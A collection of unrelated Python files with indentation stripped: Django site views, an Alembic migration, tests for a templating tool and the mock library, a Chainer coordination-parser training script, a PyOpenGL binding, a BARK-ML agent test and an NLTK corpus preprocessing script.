from .forms import (
B2DropProviderForm,
DatafileForm,
DatafileUpdateForm,
DatasetAddFileForm,
DatasetForm,
DropboxProviderForm,
FolderForm,
ForgotPasswordForm,
GDriveProviderForm,
LoginForm,
PasswordChangeForm,
RegisterForm,
ResetPasswordForm,
S3ProviderForm,
WLWebdavProviderForm,
)
class Root(TemplateView):
def get_template_names(self):
"""
Returns a list of template names to be used for the request. Must return
a list. May not be called if render_to_response is overridden.
"""
domain = Site.objects.get_current().domain
if "west-life" in domain:
return ['static_pages/landing_westlife.html']
elif "pype" in domain:
return ['static_pages/landing_pype.html']
return ['static_pages/landing_westlife.html']
def westlife_services(request):
context = get_login_context(request)
return render(request, 'static_pages/westlife/services.html', context)
def legal(request):
context = get_login_context(request)
return render(request, 'static_pages/cgv.html', context)
def internet_explorer(request):
context = get_login_context(request)
return render(request, 'static_pages/internet_explorer.html', context)
def westlife_static_page(request, page_name='fweh.html', render_kwargs=None):
if render_kwargs is None:
render_kwargs = dict()
context = get_login_context(request)
return render(request, 'static_pages/westlife/%s' % page_name, context, **render_kwargs)
#
# Debug information
#
class BuildInfo(View):
def get(self, *args, **kwargs):
version_file_path = os.path.join(settings.BASE_DIR, 'build_info.txt')
try:
with open(version_file_path, 'r') as f:
data = f.read()
except IOError:
data = 'No build information found. Probably means we are in development mode.'
return HttpResponse(data, content_type='text/plain')
class MainPage(TemplateView):
template_name = 'main.html'
def get_context_data(self, **kwargs):
context = super(MainPage, self).get_context_data(**kwargs)
user = self.request.user
context.update({
'INTERCOM_APP_ID': settings.INTERCOM_APP_ID,
'b2dropprovider_form': B2DropProviderForm(),
'wlwebdavprovider_form': WLWebdavProviderForm(),
'change_password_form': PasswordChangeForm(user=user),
'datafile_form': DatafileForm(),
'datafile_update_form': DatafileUpdateForm(),
'dataset_add_file_form': DatasetAddFileForm(),
'dataset_form': DatasetForm(),
'dropboxprovider_form': DropboxProviderForm(),
'folder_form': FolderForm(),
'forgot_password_form': ForgotPasswordForm(),
'gdriveprovider_form': GDriveProviderForm(),
'login_form': LoginForm(),
'register_form': RegisterForm(),
'reset_password_form': ResetPasswordForm(),
's3provider_form': S3ProviderForm(),
})
return context
def whoami(request):
return HttpResponse(request.user.username)
def logout(request):
django_logout(request)
#return HttpResponse('Logged out!')
return redirect('home')
def switch_login(request):
next_url=request.GET.get('next', '/virtualfolder/')
if hasattr(settings, 'SAML_CONFIG'):
return redirect('/saml2/login/?next=%s' % next_url)
else:
return redirect('/accounts/login/?next=%s' % next_url)
|
"""create table game
Revision ID: aeab08c9fd34
Revises: a81e5dd18927
Create Date: 2019-08-11 16:59:53.968757
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = 'aeab08c9fd34'
down_revision = 'a81e5dd18927'
branch_labels = None
depends_on = None
def upgrade():
op.create_table('game',
sa.Column('id',
sa.Integer,
primary_key=True),
sa.Column('name',
sa.String(250),
nullable=False),
sa.Column('image',
sa.String(250),
nullable=False,
default='default.jpg'))
def downgrade():
op.drop_table('game')
|
# -*- coding: utf-8 -*-
from mockdown.mockdown import Mockdown
class TestMockdown:
def test_exists(self, tmpdir):
m = Mockdown(tmpdir.strpath)
assert m.exists("a.txt") is False
tmpdir.join("a.txt").write("hello")
assert m.exists("a.txt") is True
def read_yaml_file(self, tmpdir):
m = Mockdown(tmpdir.strpath)
assert m.read_yaml_file("a.yml") == {}
tmpdir.join("a.yml").write("name: Alice")
assert m.read_yaml_file("a.yml") == {"name": "Alice"}
def test_read_arguments(self, tmpdir):
m = Mockdown(tmpdir.strpath)
assert m.read_arguments("a.html") == {}
tmpdir.join("a.yml").write("name: Alice")
assert m.read_arguments("a.html") == {"name": "Alice"}
def test_render_template(self, tmpdir):
m = Mockdown(tmpdir.strpath)
tmpdir.join("a.html").write("Hello {{name}}")
tmpdir.join("a.yml").write("name: Alice")
assert m.render_template("a.html") == "Hello Alice"
def test_fake(self, tmpdir, monkeypatch):
m = Mockdown(tmpdir.strpath)
class FakeFake:
def name(self):
return "fake-name"
def email(self):
return "fake-email"
monkeypatch.setattr(m, "get_fake", lambda filename: FakeFake())
tmpdir.join("a.yml").write("name: {{fake.name()}}")
assert m.read_yaml_file("a.yml") == {"name": "fake-name"}
def test_includes(self, tmpdir):
m = Mockdown(tmpdir.strpath)
tmpdir.join("a.yml").write("x: 1\ny: 2\n")
tmpdir.join("b.yml").write(
"z: 3\n" +
"_includes:\n" +
" - 'a.yml'\n")
assert m.read_yaml_file("b.yml") == {"x": 1, "y": 2, "z": 3}
def test_include_overwrites(self, tmpdir):
m = Mockdown(tmpdir.strpath)
tmpdir.join("a.yml").write("x: 1\ny: 2\n")
tmpdir.join("b.yml").write(
"x: 3\n" +
"_includes:\n" +
" - 'a.yml'\n")
assert m.read_yaml_file("b.yml") == {"x": 3, "y": 2}
def test_deep_include(self, tmpdir):
m = Mockdown(tmpdir.strpath)
tmpdir.join("a.yml").write("x: 1\ny: 2\n")
tmpdir.join("b.yml").write("data: {{include('a.yml')}}")
assert m.read_yaml_file("b.yml") == {"data": {"x": 1, "y": 2}}
|
#!/usr/bin/env python
import chainer
from teras import training
from teras.app import App, arg
from teras.utils import git, logging
from tqdm import tqdm
import dataset
import eval as eval_module
import models
import parsers
import utils
chainer.Variable.__int__ = lambda self: int(self.data)
chainer.Variable.__float__ = lambda self: float(self.data)
logging.captureWarnings(True)
def train(
train_file,
test_file=None,
format='tree',
embed_file=None,
n_epoch=20,
batch_size=20,
lr=0.001,
limit=-1,
l2_lambda=0.0,
grad_clip=5.0,
encoder_input=('char', 'postag'),
model_config=None,
device=-1,
save_dir=None,
seed=None,
cache_dir='',
disable_cache=False,
refresh_cache=False):
if seed is not None:
utils.set_random_seed(seed, device)
logger = logging.getLogger()
assert isinstance(logger, logging.AppLogger)
if model_config is None:
model_config = {}
loader = dataset.DataLoader.build(
word_embed_size=model_config.get('word_embed_size', 100),
postag_embed_size=model_config.get('postag_embed_size', 50),
char_embed_size=model_config.get('char_embed_size', 10),
word_embed_file=embed_file,
filter_coord=(format == 'tree'),
enable_cache=not(disable_cache),
refresh_cache=refresh_cache,
format=format,
cache_options=dict(dir=cache_dir, mkdir=True, logger=logger),
extra_ids=(git.hash(),))
cont_embed_file_ext = _get_cont_embed_file_ext(encoder_input)
use_cont_embed = cont_embed_file_ext is not None
train_dataset = loader.load_with_external_resources(
train_file, train=True, bucketing=False,
size=None if limit < 0 else limit, refresh_cache=refresh_cache,
use_external_postags=True,
use_contextualized_embed=use_cont_embed,
contextualized_embed_file_ext=cont_embed_file_ext,
logger=logger)
logger.info('{} samples loaded for training'.format(len(train_dataset)))
test_dataset = None
if test_file is not None:
test_dataset = loader.load_with_external_resources(
test_file, train=False, bucketing=False,
size=None if limit < 0 else limit // 10,
refresh_cache=refresh_cache,
use_external_postags=True,
use_contextualized_embed=use_cont_embed,
contextualized_embed_file_ext=cont_embed_file_ext,
logger=logger)
logger.info('{} samples loaded for validation'
.format(len(test_dataset)))
builder = models.CoordSolverBuilder(
loader, inputs=encoder_input, **model_config)
logger.info("{}".format(builder))
model = builder.build()
logger.trace("Model: {}".format(model))
if device >= 0:
chainer.cuda.get_device_from_id(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(
alpha=lr, beta1=0.9, beta2=0.999, eps=1e-08)
optimizer.setup(model)
if l2_lambda > 0.0:
optimizer.add_hook(chainer.optimizer.WeightDecay(l2_lambda))
if grad_clip > 0.0:
optimizer.add_hook(chainer.optimizer.GradientClipping(grad_clip))
def _report(y, t):
values = {}
model.compute_accuracy(y, t)
for k, v in model.result.items():
if 'loss' in k:
values[k] = float(chainer.cuda.to_cpu(v.data))
elif 'accuracy' in k:
values[k] = v
training.report(values)
trainer = training.Trainer(optimizer, model, loss_func=model.compute_loss)
trainer.configure(utils.training_config)
trainer.add_listener(
training.listeners.ProgressBar(lambda n: tqdm(total=n)), priority=200)
trainer.add_hook(
training.BATCH_END, lambda data: _report(data['ys'], data['ts']))
if test_dataset:
parser = parsers.build_parser(loader, model)
evaluator = eval_module.Evaluator(
parser, logger=logger, report_details=False)
trainer.add_listener(evaluator)
if save_dir is not None:
accessid = logger.accessid
date = logger.accesstime.strftime('%Y%m%d')
metric = 'whole' if isinstance(model, models.Teranishi17) else 'inner'
trainer.add_listener(utils.Saver(
model, basename="{}-{}".format(date, accessid),
context=dict(App.context, builder=builder),
directory=save_dir, logger=logger, save_best=True,
evaluate=(lambda _: evaluator.get_overall_score(metric))))
trainer.fit(train_dataset, test_dataset, n_epoch, batch_size)
def test(model_file, test_file, filter_type=True, limit=-1, device=-1):
context = utils.Saver.load_context(model_file)
logger = logging.getLogger()
logger.trace('# context: {}'.format(context))
if context.seed is not None:
utils.set_random_seed(context.seed, device)
loader = context.builder.loader
loader.filter_coord = filter_type
encoder_input = context.encoder_input
cont_embed_file_ext = _get_cont_embed_file_ext(encoder_input)
use_cont_embed = cont_embed_file_ext is not None
test_dataset = loader.load_with_external_resources(
test_file, train=False, bucketing=False,
size=None if limit < 0 else limit,
use_external_postags=True,
use_contextualized_embed=use_cont_embed,
contextualized_embed_file_ext=cont_embed_file_ext,
logger=logger)
logger.info('{} samples loaded for test'.format(len(test_dataset)))
model = context.builder.build()
chainer.serializers.load_npz(model_file, model)
if device >= 0:
chainer.cuda.get_device_from_id(device).use()
model.to_gpu(device)
parser = parsers.build_parser(loader, model)
evaluator = eval_module.Evaluator(
parser, logger=logger, report_details=True)
reporter = training.listeners.Reporter(logger)
logger.info('Start decoding')
utils.chainer_train_off()
evaluator.on_epoch_validate_begin({'epoch': -1})
pbar = tqdm(total=len(test_dataset))
for batch in test_dataset.batch(
context.batch_size, colwise=True, shuffle=False):
xs, ts = batch[:-1], batch[-1]
ys = model.forward(*xs)
loss = model.compute_loss(ys, ts)
with reporter:
values = dict(loss=float(chainer.cuda.to_cpu(loss.data)))
model.compute_accuracy(ys, ts)
for k, v in model.result.items():
if 'loss' in k:
values[k] = float(chainer.cuda.to_cpu(v.data))
elif 'accuracy' in k:
values[k] = v
reporter.report(values)
evaluator.on_batch_end({'train': False, 'xs': xs, 'ts': ts})
pbar.update(len(ts))
pbar.close()
reporter._output_log("testing", reporter.get_summary(),
{'epoch': -1, 'size': len(test_dataset)})
evaluator.on_epoch_validate_end({'epoch': -1})
def _get_cont_embed_file_ext(encoder_input):
ext = None
if sum(('elmo' in encoder_input,
'bert-base' in encoder_input,
'bert-large' in encoder_input)) > 1:
raise ValueError('at most 1 contextualized emebeddings can be chosen')
elif 'elmo' in encoder_input:
ext = '.elmo.hdf5'
elif 'bert-base' in encoder_input:
ext = '.bert-base.hdf5'
elif 'bert-large' in encoder_input:
ext = '.bert-large.hdf5'
return ext
def parse(model_file, target_file, contextualized_embed_file=None,
n_best=1, device=-1):
context = utils.Saver.load_context(model_file)
logger = logging.getLogger()
logger.trace('# context: {}'.format(context))
if context.seed is not None:
utils.set_random_seed(context.seed, device)
loader = context.builder.loader
encoder_input = context.encoder_input
use_cont_embed = _get_cont_embed_file_ext(encoder_input) is not None
if use_cont_embed and contextualized_embed_file is None:
raise ValueError(
"contextualized_embed_file must be specified when using "
"a model trained with contextualized embeddings")
elif not use_cont_embed and contextualized_embed_file is not None:
raise ValueError(
"contextualized_embed_file must not be specified when using "
"a model trained without contextualized embeddings")
if target_file.endswith('.txt'):
loader.init_reader(format='default')
loader.set_contextualized_embed_file(contextualized_embed_file)
target_dataset = loader.load_with_external_resources(
target_file, mode='parse', use_external_postags=True, logger=logger)
logger.info('{} samples loaded for parsing'.format(len(target_dataset)))
model = context.builder.build()
chainer.serializers.load_npz(model_file, model)
if device >= 0:
chainer.cuda.get_device_from_id(device).use()
model.to_gpu(device)
parser = parsers.build_parser(loader, model)
logger.info('Start parsing')
utils.chainer_train_off()
pbar = tqdm(total=len(target_dataset))
for batch in target_dataset.batch(
context.batch_size, colwise=True, shuffle=False):
xs, (words, indices, sentence_id) = batch[:-3], batch[-3:]
parsed = parser.parse(*xs, n_best)
for results, words_i, indices_i, sentence_id_i \
in zip(parsed, words, indices, sentence_id):
raw_sentence = ' '.join(words_i)
for best_k, (coords, score) in enumerate(results):
output = [
"#!RAW: {}".format(raw_sentence),
"SENTENCE: {}".format(sentence_id_i),
"CANDIDATE: #{}".format(best_k),
"SCORE: {}".format(score),
]
if indices_i is not None:
coords = dataset.postprocess(coords, indices_i)
for cc, coord in sorted(coords.items()):
output.append("CC: {} {}".format(cc, words_i[cc]))
if coord is not None:
b, e = coord.conjuncts[0][0], coord.conjuncts[-1][1]
output.append("COORD: {} {} {}".format(
b, e, ' '.join(words_i[b:e + 1])))
for (b, e) in coord.conjuncts:
output.append("CONJ: {} {} {}".format(
b, e, ' '.join(words_i[b:e + 1])))
else:
output.append("COORD: None")
print('\n'.join(output) + '\n')
pbar.update(len(sentence_id))
pbar.close()
def check_grammar(test_file, limit=-1, grammar_type=1):
logger = logging.getLogger()
loader = dataset.DataLoader(filter_coord=True)
test_dataset = loader.load(test_file, train=True, bucketing=False,
size=None if limit < 0 else limit)
word_vocab = loader.get_processor('word').vocab
from models.gold import GoldModel
model = GoldModel()
if grammar_type == 1:
cfg = parsers.Grammar.CFG_COORD_1 + parsers.Grammar.CFG
elif grammar_type == 2:
cfg = parsers.Grammar.CFG_COORD_2 + parsers.Grammar.CFG
else:
raise ValueError("Invalid grammar type: {}".format(grammar_type))
grammar = parsers.Grammar(word_vocab, cfg)
parser = parsers.CkyParser(model, grammar)
evaluator = eval_module.Evaluator(
parser, logger=logger, report_details=False)
n_corrects = 0
pbar = tqdm(total=len(test_dataset))
for batch in test_dataset.batch(size=20, colwise=True, shuffle=False):
xs, ts = batch[:-1], batch[-1]
true_coords_batch = ts
model.set_gold(true_coords_batch)
pred_coords_batch = evaluator._parser.parse(*xs, n_best=1)
for i, (pred_coord_entries, true_coords) in \
enumerate(zip(pred_coords_batch, true_coords_batch)):
pred_coords, _score = pred_coord_entries[0]
true_coords = {ckey: coord for ckey, coord
in true_coords.items() if coord is not None}
for k, v in tuple(pred_coords.items()):
if v is None:
del pred_coords[k]
if pred_coords == true_coords:
n_corrects += 1
else:
sentence = ' '.join(
[word_vocab.lookup(word_id) for word_id in xs[0][i]])
print("SENTENCE: {}\nPRED: {}\nTRUE: {}\n-"
.format(sentence, pred_coords, true_coords))
evaluator.add(pred_coords, true_coords)
pbar.update(len(ts))
pbar.close()
evaluator.report()
logger.info("Number of correct tree: {}/{}"
.format(n_corrects, len(test_dataset)))
if __name__ == "__main__":
App.configure(logdir=App.basedir + '/../logs')
logging.AppLogger.configure(mkdir=True)
App.add_command('train', train, {
'batch_size':
arg('--batchsize', type=int, default=20, metavar='NUM',
help='Number of examples in each mini-batch'),
'cache_dir':
arg('--cachedir', type=str, default=(App.basedir + '/../cache'),
metavar='DIR', help='Cache directory'),
'disable_cache':
arg('--nocache', action='store_true', help='Disable cache'),
'test_file':
arg('--devfile', type=str, default=None, metavar='FILE',
help='Development data file'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'embed_file':
arg('--embedfile', type=str, default=None, metavar='FILE',
help='Pretrained word embedding file'),
'n_epoch':
arg('--epoch', type=int, default=20, metavar='NUM',
help='Number of sweeps over the dataset to train'),
'format':
arg('--format', type=str, choices=('tree', 'genia'), default='tree',
help='Training/Development data format'),
'grad_clip':
arg('--gradclip', type=float, default=5.0, metavar='VALUE',
help='L2 norm threshold of gradient norm'),
'encoder_input':
arg('--inputs', type=str,
choices=('char', 'postag', 'elmo', 'bert-base', 'bert-large'),
nargs='*', default=('char', 'postag'),
help='Additional inputs for the encoder'),
'l2_lambda':
arg('--l2', type=float, default=0.0, metavar='VALUE',
help='Strength of L2 regularization'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'lr':
arg('--lr', type=float, default=0.001, metavar='VALUE',
help='Learning Rate'),
'model_config':
arg('--model', action='store_dict', metavar='KEY=VALUE',
help='Model configuration'),
'refresh_cache':
arg('--refresh', '-r', action='store_true', help='Refresh cache'),
'save_dir':
arg('--savedir', type=str, default=None, metavar='DIR',
help='Directory to save the model'),
'seed':
arg('--seed', type=int, default=None, metavar='VALUE',
help='Random seed'),
'train_file':
arg('--trainfile', type=str, required=True, metavar='FILE',
help='Training data file'),
})
App.add_command('test', test, {
'filter_type':
arg('--filter', type=str,
choices=('any', 'simple', 'not_simple', 'consecutive', 'multiple'),
default='any', help='Filter type for sentence'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'model_file':
arg('--modelfile', type=str, required=True, metavar='FILE',
help='Trained model file'),
'test_file':
arg('--testfile', type=str, required=True, metavar='FILE',
help='Test data file'),
})
App.add_command('parse', parse, {
'contextualized_embed_file':
arg('--cembfile', type=str, metavar='FILE',
help='Contextualized embeddings file'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'model_file':
arg('--modelfile', type=str, required=True, metavar='FILE',
help='Trained model file'),
'n_best':
arg('--nbest', type=int, default=1, metavar='NUM',
help='Number of candidates to output'),
'target_file':
arg('--input', type=str, required=True, metavar='FILE',
help='Input text file to parse'),
})
App.add_command('check', check_grammar, {
'grammar_type':
arg('--grammar', type=int, choices=(1, 2), default=1,
help='grammar type'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'test_file':
arg('--testfile', type=str, required=True, metavar='FILE',
help='Test data file'),
})
App.run()
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_tessellation_shader',error_checker=_errors._error_checker)
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
def glPatchParameterfv(pname,values):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteri(pname,value):pass
|
# Copyright (c) 2020 fortiss GmbH
#
# Authors: Julian Bernhard, Patrick Hart
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
try:
import debug_settings
except:
pass
import unittest
import numpy as np
from gym import spaces
# BARK imports
from bark.runtime.commons.parameters import ParameterServer
from bark_ml.library_wrappers.lib_fqf_iqn_qrdqn.agent import ImitationAgent
observation_length = 5
num_actions = 4
class TestObserver:
@property
def observation_space(self):
# TODO(@hart): use from spaces.py
return spaces.Box(
low=np.zeros(observation_length),
high = np.ones(observation_length))
class TestActionWrapper():
@property
def action_space(self):
return spaces.Discrete(num_actions)
def action_values_at_state(state):
envelope_costs = []
collision_costs = []
return_values = []
for idx in range(1, num_actions+1):
envelope_costs.append(state[0]* 1.0/idx + state[1]* 1.0/idx)
collision_costs.append(state[1]* 1.0/idx*0.001 + state[3]* 1.0/idx*0.001)
collision_costs.append(state[3]* 1.0/idx*0.2 + state[4]* 1.0/idx*0.1)
action_values = []
action_values.extend(envelope_costs)
action_values.extend(collision_costs)
action_values.extend(return_values)
return [state, action_values]
def create_data(num):
observations = np.random.rand(num, observation_length)
action_values_data = np.apply_along_axis(action_values_at_state, 1, observations)
return action_values_data
class TestMotionPrimitiveBehavior:
def __init__(self, num_actions):
self._num_actions = num_actions
def GetMotionPrimitives(self):
return list(range(0,self._num_actions))
class TestDemonstrationCollector:
def __init__(self):
self.data = create_data(10000)
self._observer = TestObserver()
self._ml_behavior = TestActionWrapper()
self.motion_primitive_behavior = TestMotionPrimitiveBehavior(num_actions)
def GetDemonstrationExperiences(self):
return self.data
@property
def observer(self):
return self._observer
@property
def ml_behavior(self):
return self._ml_behavior
def GetDirectory(self):
return ""
class EvaluationTests(unittest.TestCase):
# make sure the agent works
def test_agent_wrapping(self):
params = ParameterServer()
params["ML"]["BaseAgent"]["NumSteps"] = 10
params["ML"]["BaseAgent"]["MaxEpisodeSteps"] = 2
params["ML"]["BaseAgent"]["EvalInterval"] = 2
params["ML"]["BaseAgent"]["TrainTestRatio"] = 0.2
demonstration_collector = TestDemonstrationCollector()
agent = ImitationAgent(agent_save_dir="./save_dir",
demonstration_collector=demonstration_collector,
params=params, checkpoint_load = False)
agent.run()
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
"""Generate the pickle file of 1b_corpus dataset"""
import os
import pickle
from multiprocessing import Process, Queue
from Queue import Empty # Exception raised when a Queue is empty
from time import ctime
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize as wt
def process_data(pid, qs, path_in, path_out):
# size_print = 10 # print size for test
while not qs.empty():
try:
fname = qs.get()
print('P%s start %s at %s' % (str(pid), fname, ctime()))
except Empty: # seems never reach here
print('Finish at %s' % ctime())
break
fpath = os.path.join(path_in, fname)
# tokenize and lower the case
with open(fpath, 'r') as f:
words_tok = [[word.lower() for word in wt(sent.decode('utf-8'))]
for sent in f]
# print(words_tok[:size_print])
# remove punctuation and other non-alphabet character
words_alphabet = [[word for word in words if word.isalpha()]
for words in words_tok]
# print(words_alphabet[:size_print])
# remove stop words
english_stopwords = stopwords.words('english')
words_filtered = [[
word for word in words if word not in english_stopwords
] for words in words_alphabet]
# print(words_filtered[:size_print])
with open(os.path.join(path_out, '%s.pkl' % fname), 'wb') as f:
pickle.dump(words_filtered, f)
print('P%s done %s at %s' % (str(pid), fname, ctime()))
def provide_data():
path_in = '/data/home/py/data/1b-corpus/trainset'
path_out = './pkl/'
if not os.path.exists(path_out):
os.mkdir(path_out)
queue_size = 100
qs = Queue(queue_size)
for fname in os.listdir(path_in):
qs.put(fname)
size_process = 3
ps = [
Process(target=process_data, args=(pid, qs, path_in, path_out))
for pid in range(size_process)
]
for p in ps:
p.start()
for p in ps:
p.join()
if __name__ == '__main__':
provide_data()
print('Finish...')
|
import unittest2 as unittest
from mock import DEFAULT, Mock, MagicMock, patch, create_autospec, call
import sys, time, re
THIS_MODULE = sys.modules[__name__]
class ClassUnderTest(object):
def __init__(self):
self._collaborator = Collaborator()
def do_something(self, foo, bar, *args, **kwargs):
self._helper(foo, bar, *args, **kwargs)
self._collaborator.do_someting_complicated(
self._helper(foo, bar), *args, **kwargs)
def _helper(self, foo, bar):
raise RuntimeError('ClassUnderTest._helper should be mocked.')
return arg1 * arg2
class Collaborator(object):
def __init__(self, data):
raise RuntimeError('Collaborator.__init__ should be mocked.')
self._data = data
def do_something_complicated(self, foobar, *args, **kwargs):
self._helper(foobar, *args, **kwargs)
def _helper(self, foobar, *args, **kwargs):
raise RuntimeError('Collaborator._helper should be mocked.')
CollaboratorOrig = Collaborator # for type testing, after patching
class CollaboratorForTest(Collaborator):
_data = None # as a placeholder, and will be configured later.
class MockTest(unittest.TestCase):
def test_mock(self):
mock = Mock()
self.assertTrue(callable(mock))
self.assertIsInstance(mock.this_attr, Mock) # create attributes and new mocks when accessing them
self.assertTrue(hasattr(mock, 'that_attr')) # also true for hasattr test
self.assertIsInstance(mock.that_attr, Mock)
self.assertIs(mock.this_attr, mock.this_attr) # always return the same mock
self.assertIsNot(mock.this_attr, mock.that_attr)
def test_magic_mock(self): # behave in the same way
mock = MagicMock()
self.assertTrue(callable(mock))
self.assertIsInstance(mock.this_attr, MagicMock)
self.assertIsInstance(mock.that_attr, MagicMock)
self.assertIs(mock.this_attr, mock.this_attr)
self.assertIsNot(mock.this_attr, mock.that_attr)
def test_magic_attributes(self): # for both Mock and MagicMock
mock, magic = Mock(), MagicMock()
self.assertTrue(hasattr(mock, '__str__'))
self.assertNotIsInstance(mock.__str__, (Mock, MagicMock)) # not patched
self.assertFalse(hasattr(mock, '__xyz__'))
with self.assertRaises(AttributeError):
mock.__xyz__
self.assertTrue(hasattr(magic, '__str__'))
self.assertIsInstance(magic.__str__, MagicMock) # pre-created
self.assertFalse(hasattr(magic, '__xyz__'))
with self.assertRaises(AttributeError): # only magic methods are pre-created
magic.__xyz__
class MockConfigTest(unittest.TestCase):
def test_return_value(self):
mock = Mock(return_value=3)
self.assertEqual(mock('foo'), 3) # regardless of the arguments
self.assertEqual(mock('bar'), 3)
def test_side_effect(self):
mock = Mock(side_effect=KeyError('foo')) # exception instance
self.assertRaises(KeyError, mock)
mock = Mock(side_effect=KeyError) # exception class
self.assertRaises(KeyError, mock)
mock = Mock(side_effect=('foo', KeyError('bar'))) # consecutive return values
self.assertEqual(mock(), 'foo')
self.assertRaises(KeyError, mock)
self.assertRaises(StopIteration, mock) # out of values
def test_side_effect_function(self):
def side_effect(x, y):
mapping = {
(0, 0): DEFAULT,
(1, 2): 3,
(3, 4): 7,
}
if (x, y) in mapping:
return mapping[(x, y)]
else:
raise RuntimeError()
fun = Mock(side_effect=side_effect)
self.assertEqual(fun(1, 2), 3)
self.assertEqual(fun(3, 4), 7)
with self.assertRaises(RuntimeError):
fun(1, 4)
self.assertIsInstance(fun(0, 0), Mock) # respect return_value, which is DEFAULT
self.assertIs(fun(0, 0), fun(0, 0))
fun.return_value = 99 # override the DEFAULT
self.assertEqual(fun(0, 0), 99)
self.assertEqual(fun(1, 2), 3) # side_effect wins return_value
def test_side_effect_wins_return_value(self):
mock = Mock(side_effect=('foo',), return_value='bar')
self.assertEqual(mock(), 'foo') # side_effect wins
self.assertRaises(StopIteration, mock)
